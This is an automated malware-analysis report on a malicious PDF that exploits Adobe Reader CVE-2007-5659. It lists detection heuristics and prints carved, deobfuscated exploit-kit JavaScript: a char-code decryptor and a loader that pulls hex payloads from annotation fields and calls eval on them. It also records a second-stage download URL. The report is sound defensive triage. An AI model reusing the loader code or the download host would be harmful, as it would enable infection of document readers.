Verdict: MALICIOUS
Risk Score: 266

Malware Insights

MITRE ATT&CK: T1059.001 PowerShell
The PDF file contains multiple embedded JavaScript streams, some of which are obfuscated using String.fromCharCode and other techniques. The heuristics indicate that the PDF launcher concatenates information fields, extracts characters at a fixed stride, and evaluates the result. This suggests the script's primary purpose is to download and execute a second-stage payload from a remote source, a common technique for initial access.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (9)

- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE exact; rule `CVE_2007_5659`): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- JavaScript action (low; 4 related findings; rule `PDF_JAVASCRIPT`): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (high; CVE likely; rule `PDF_JS_ADOBE_APSB08_13_PATCH_GATE`): PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  Matched line in script:
  ```javascript
  var L6je5pyH = new Array();var WY__gFK8t006__w = 0;var P_00Hh_r = "";function e78__rQa2_FB__v(AU8O5qP34j, MY__To___ubf_X){var VLk04Ilw234V6p = MY__To___ubf_X.toString();var H4l7_6cn = "";for(var bp330arwN3uG = 0; bp330arwN3uG < VLk04Ilw234V6p.length; bp330arwN3uG++) {var i3W_TgR5kUk = parseInt(VLk04Ilw234V6p.substr(bp330arwN3uG, 1));if (!isNaN(i3W_TgR5kUk)) {i3W_TgR5kUk = i3W_TgR5kUk.toString(16);if (i3W_TgR5kUk.length == 1) { i3W_TgR5kUk = "0" + i3W_TgR5kUk; }else if (i3W_TgR5kUk.length != 2) { …
  ```
- PDF JavaScript exploit cluster (critical; rule `PDF_JS_EXPLOIT_CLUSTER`): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script:
  ```javascript
  for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); }
  ```
- PDF exploit shellcode contains an embedded download URL (high; rule `PDF_JS_SHELLCODE_DOWNLOAD_URL`): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; rule `PDF_JS`): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- syncAnnotScan annotation-staging primitive (low; rule `PDF_FOXIT_SYNCANNOTSCAN`): PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
- Suspicious extracted artifact (info; rule `EXTRACTED_FILE_STATIC_TRIAGE`): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule `EMBEDDED_URL`): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: `http://googleinru.in/cgi-bin/etn/z006106201r0019Reebe2cb9Xc1067111Y2c3cc32cZ0100f060` (referenced by PDF JavaScript)
Extracted artifacts (4)

Files carved from inside the sample during analysis.
javascript_obj0004_000.js
- Kind: pdf-javascript-stream
- Source: PDF /JS object 4 at offset 0xE1
- Size: 1940 bytes
- SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
- Detection, ClamAV: No threats found
- Detection, obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
```javascript
function decrypt(str, jump){
    var result = "";
    var list = str.split(',');
    for (var i=0; i < list.length; i++) {
        result += String.fromCharCode(list[i] - jump);
    }
    return result;
}
```
numeric_charcode_stage_000.js
- Kind: deobfuscated-js
- Source: numeric char-code string decoded JavaScript at offset 0xEF
- Size: 505 bytes
- SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
- Detection, ClamAV: No threats found
- Detection, obfuscation or payload: likely (carved artifact contains 2 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
```javascript
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
    var num = 1;
    pr = app.doc.getAnnots(
        {
            nPage: 0
        }
    );
    sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
    fnc += 'a';
    var arr = sum.split(/-/);
    var proc = String.fromCharCode(22+15);
    for (var i = 1; i < arr.length; i++) {
        buf += String.fromCharCode("0x"+arr[i]);
    }
}
if (app.plugIns.length >= 2) {
    fnc += 'l';
    app[fnc](buf);
}
```
legacy_pdfkit_stage_000.js
- Kind: deobfuscated-js
- Source: repeated-marker hex decoded JavaScript at offset 0x1B90
- Size: 1839 bytes
- SHA-256: 5e8883b77cb9423a668d5630a09301e84fb8854fc1de2b2def92920811bc1f58
- Detection, ClamAV: No threats found
- Detection, obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))
legacy_pdfkit_stage_001.js
- Kind: deobfuscated-js
- Source: annotation-subject callee-key decoded JavaScript at offset 0x4C3
- Size: 4979 bytes
- SHA-256: 08f5dd48c8a7c653d1ec0a6ef8f069f76914376162b6701766260fc8638f5cb3
- Detection, ClamAV: No threats found
- Detection, obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building token(s))